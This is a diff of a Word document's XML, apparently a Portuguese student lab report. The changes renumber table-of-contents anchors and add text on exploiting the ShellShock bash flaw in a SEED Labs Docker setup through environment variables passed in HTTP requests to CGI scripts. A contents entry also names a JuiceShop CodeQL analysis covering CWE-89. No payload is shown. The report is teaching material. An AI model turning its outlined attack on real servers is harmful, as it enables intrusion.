-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-          <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
@@ -382,7 +370,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc213009127" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030668" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -411,7 +399,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009127 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030668 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -458,7 +446,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009128" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030669" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -518,7 +506,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009128 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030669 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -565,7 +553,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009129" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030670" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -614,7 +602,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009129 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030670 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -661,7 +649,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009130" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030671" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -710,7 +698,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009130 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030671 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -757,7 +745,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009131" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030672" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -806,7 +794,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009131 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030672 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -853,7 +841,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009132" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030673" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -902,7 +890,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009132 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030673 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -949,7 +937,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009133" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030674" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -998,7 +986,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009133 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030674 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1045,7 +1033,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009134" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030675" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1094,7 +1082,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009134 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030675 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1141,7 +1129,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009135" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030676" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1190,7 +1178,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009135 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030676 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1210,7 +1198,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1237,7 +1225,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213009136" w:history="1">
+          <w:hyperlink w:anchor="_Toc213030677" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1286,7 +1274,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213009136 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030677 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1307,6 +1295,294 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="960"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213030678" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>B/C – JuiceShop github execution</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030678 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213030679" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.2.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>CodeQL análise</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030679 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213030680" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>1.1.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>CodeQL CWE-89</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213030680 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1477,13 +1753,12 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc213009127"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="0" w:name="_Toc213030668"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
         <w:t>Introdução</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
@@ -1515,7 +1790,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc213009128"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc213030669"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1523,7 +1798,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Parte 1- </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1534,7 +1808,6 @@
         <w:t>ShellShock</w:t>
       </w:r>
       <w:bookmarkEnd w:id="1"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1573,7 +1846,6 @@
         </w:rPr>
         <w:t xml:space="preserve">explorada uma vulnerabilidade na aplicação </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1583,7 +1855,6 @@
         </w:rPr>
         <w:t>bash</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1607,7 +1878,6 @@
         </w:rPr>
         <w:t xml:space="preserve">, a qual ficou conhecida como </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1617,7 +1887,6 @@
         </w:rPr>
         <w:t>ShellShock</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1703,7 +1972,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc213009129"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc213030670"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1743,9 +2012,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Docker-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Docker-Image</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que contém a versão vulnerável do </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1753,27 +2028,8 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Image</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que contém a versão vulnerável do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
         <w:t>bash</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1822,7 +2078,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="7A91595F">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="3315ADBC">
             <wp:extent cx="3333750" cy="2824514"/>
             <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
             <wp:docPr id="797099606" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
@@ -1942,39 +2198,8 @@
           <w:iCs w:val="0"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> - /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>-bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>getenv.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> - /cgi-bin/getenv.cgi</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2112,39 +2337,8 @@
           <w:iCs w:val="0"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> - /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>vul.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> - /cgi bin/vul.cgi</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2159,6 +2353,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t xml:space="preserve">Na figura 1 e 2, podemos ver que ambos os programas estão inicializados e a responder com o </w:t>
       </w:r>
@@ -2185,19 +2380,8 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEED </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Labs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>SEED Labs</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2218,13 +2402,12 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc213009130"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="3" w:name="_Toc213030671"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
         <w:t>Vulnerabilidade</w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
@@ -2252,9 +2435,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEED </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>SEED Labs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>, capítulo “</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2262,15 +2451,14 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Labs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>, capítulo “</w:t>
+        <w:t>3.2 Task 2: Passing Data to Bash via Environment Variable</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” para explorar esta vulnerabilidade do programa </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2279,9 +2467,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o atacante precisa de passar a sua informação ao programa </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2289,9 +2483,32 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Task</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> através de variáveis de ambiente.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Quando um pedido </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2299,9 +2516,22 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 2: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é enviado ao servidor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, através do </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2309,9 +2539,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Passing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
